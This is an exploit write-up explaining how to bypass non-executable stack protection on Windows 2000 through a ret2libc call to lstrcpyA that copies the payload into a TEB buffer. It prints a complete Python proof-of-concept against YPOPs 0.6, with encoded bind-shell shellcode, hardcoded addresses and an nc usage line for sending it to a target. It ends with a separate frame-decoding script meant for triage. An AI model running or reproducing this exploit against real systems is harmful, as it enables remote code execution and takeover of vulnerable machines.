Defeating Non Executable Stack Protection With TEB Buffer
Source: Internet | Editor: 程序博客网 | Time: 2024/04/29 18:56
Summary

Below is an example of exploiting a TEB (Thread Execution Block) buffer and libc that can be used when exploiting a non-executable stack Win32 environment.

Details

The exploit code below is for an old vulnerability in YPOPS (as reported in: Remote Buffer Overflow Vulnerability in YPOPs!). The exploit demonstrates a way to bypass stack execution protection. EIP is overwritten with the address of the lstrcpyA function, followed by the return address (in the TEB) and then the source and destination buffer addresses. lstrcpyA copies the attacker-supplied payload to the address in the TEB, after which execution proceeds from there (since that is the return address we supplied).

Exploit Code:

```python
#!/usr/bin/env python
# Python 2 script (print statement, str payloads). The byte escapes below are
# restored to the usual \x form; the copy of the page had them as /x.
"""
Exploit for an old BoF in YPOPS v0.6 discovered by Behrang Fouldai.
Coded as a PoC for defeating non-exec stacks and stack protections like
overflow guard etc.

This exploit utilizes the 520 byte buffer in the TEB (i.e. it is used for
ANSI to Unicode string operations). The EIP is overwritten with the address
of lstrcpyA accompanied by the return address, the source and destination
buffer addresses. On successful EIP overwrite the lstrcpyA copies the
attacker supplied payload to the address in the TEB, following which
execution proceeds from there (since it is the return addr that we supplied).

Came across this useful concept in "The Shellcoder's Handbook".

Can be used for
  1) Bypassing stack protections.
  2) When none of the regs (ecx, ebx, eax, esp etc) point to our payload.

BUFFER LAYOUT

| payload | addr of lstrcpyA | addr of buff in TEB | addr of buff in TEB | addr of our payload |
                               ret addr for          destination for       addr of our
                               execution             payload               payload

Tested on Win2K Adv Server with no patches and overflowguard.
This is heavily dependent on the addresses which must be modified
according to the versions.

0x77E87E39 --> Address of lstrcpyA from kernel32.dll
0x7ffDE1BC --> Address in TEB buffer to which payload will be copied and
               execution commences
0x00E6FAB8 --> Address of Payload on stack

Shellcode from Sergio Alvarez's paper on win32 exploitation (gr8 paper).

Coded by Varun Uppal (varunuppal@linuxmail.org)
greetz to JhaanGi, swatkat_razor, saTurn444 and metasploit crew. gr8 work

USAGE: python pop_exp2.py | nc "addr of target host" "target port"
       Telnet "addr of target host" 4444 for cmd prompt
"""
import struct

# Shellcode from the paper credited above (399 bytes); per the usage note it
# gives a cmd prompt on port 4444.
exp = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
exp += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
exp += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
exp += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
exp += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
exp += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
exp += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
exp += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
exp += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
exp += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
exp += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
exp += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
exp += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
exp += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
exp += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
exp += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
exp += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
exp += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
exp += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
exp += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
exp += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
exp += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
exp += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
exp += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
exp += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"

# 10-byte NOP sled, shellcode, 96-byte NOP pad, then the frame from the
# layout above: lstrcpyA address, return address (TEB buffer), destination
# (TEB buffer), source (payload on the stack, 0x00E6FAB8 little-endian;
# its \x00 high byte is the last byte sent and terminates the string copy).
print '\x90'*10 + exp + '\x90'*96 + struct.pack('<L', 0x77e87e39) + struct.pack('<L', 0x7ffde1bc) + struct.pack('<L', 0x7ffde1bc) + '\xb8\xfa\xe6\x00'
```
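The frame shape described above (a library function address, a return address that is also the copy destination, then the source) is what an analyst looks for when triaging a captured overflow packet. The following Python is an added example, not part of the original exploit or the YPOPs project: it decodes the 16-byte ret2libc frame at the tail of a constructed sample built in the page's layout, labels each address by region, and checks whether the bytes lstrcpyA would copy (it stops at the first NUL) fit the 520-byte TEB buffer the write-up relies on. The region boundaries, the NUL-free filler standing in for the shellcode, and the function names are assumptions of this example; the three addresses and the 520-byte size are the ones quoted on the page.

```python
import struct

# Addresses quoted on the page (Win2K Advanced Server, unpatched). They are the
# expected decode results for the constructed sample, nothing more.
LSTRCPYA_ADDR = 0x77E87E39   # lstrcpyA in kernel32.dll
TEB_BUF_ADDR = 0x7FFDE1BC    # scratch buffer inside the TEB
PAYLOAD_ADDR = 0x00E6FAB8    # payload on the stack

TEB_BUFFER_SIZE = 520        # size of the TEB buffer the write-up relies on

# Region boundaries are assumptions of this example, used only for labelling.
REGIONS = (
    ("kernel32 image (assumed 0x77E00000-0x77F00000)", 0x77E00000, 0x77F00000),
    ("TEB page (assumed 0x7FFDE000-0x7FFDF000)", 0x7FFDE000, 0x7FFDF000),
    ("user stack (assumed 0x00010000-0x01000000)", 0x00010000, 0x01000000),
)


def classify(addr):
    """Label an address by the assumed region it falls in."""
    for name, lo, hi in REGIONS:
        if lo <= addr < hi:
            return name
    return "unknown"


def decode_frame(packet):
    """Decode the 16-byte ret2libc call frame at the tail of an overflow packet.

    Page layout: | payload | function | return addr | destination | source |
    Also computes how many bytes an lstrcpyA of the packet would copy (it
    stops at the first NUL) and whether that fits the TEB buffer.
    """
    if len(packet) < 16:
        raise ValueError("packet too short to hold a call frame")
    func, ret, dst, src = struct.unpack("<4L", packet[-16:])
    copy_len = packet.index(b"\x00") if b"\x00" in packet else len(packet)
    return {
        "function": func,
        "return": ret,
        "dst": dst,
        "src": src,
        "function_region": classify(func),
        "return_region": classify(ret),
        "dst_region": classify(dst),
        "src_region": classify(src),
        "copy_len": copy_len,
        "fits_teb_buffer": copy_len <= TEB_BUFFER_SIZE,
        # The tell-tale shape: the return address is the copy destination,
        # so the copied bytes are what runs when the function returns.
        "return_equals_dst": ret == dst,
        # A NUL before the final byte means the copy ends before the frame,
        # so the payload reaching the TEB is incomplete.
        "truncated_by_nul": copy_len < len(packet) - 1,
    }


def build_sample_packet(shellcode):
    """Constructed sample in the page's layout: 10-byte NOP sled, shellcode,
    96-byte NOP pad, then the four little-endian frame values."""
    return (b"\x90" * 10 + shellcode + b"\x90" * 96
            + struct.pack("<L", LSTRCPYA_ADDR)
            + struct.pack("<L", TEB_BUF_ADDR)
            + struct.pack("<L", TEB_BUF_ADDR)
            + struct.pack("<L", PAYLOAD_ADDR))


if __name__ == "__main__":
    # Constructed NUL-free filler of the same length (399 bytes) as the
    # shellcode on the page; it stands in for it and does nothing.
    sample = build_sample_packet(b"\x41" * 399)
    for key, value in decode_frame(sample).items():
        shown = hex(value) if isinstance(value, int) and not isinstance(value, bool) else value
        print("%-18s %s" % (key, shown))
```

With the page's own sizes the arithmetic is tight: 10 + 399 + 96 + 16 = 521 bytes on the wire, and the NUL high byte of the source pointer is the final byte, so lstrcpyA copies exactly 520 bytes into the 520-byte buffer. A shellcode one byte longer overruns it, and a NUL anywhere earlier in the payload stops the copy before the frame; both cases show up in the decoder's flags.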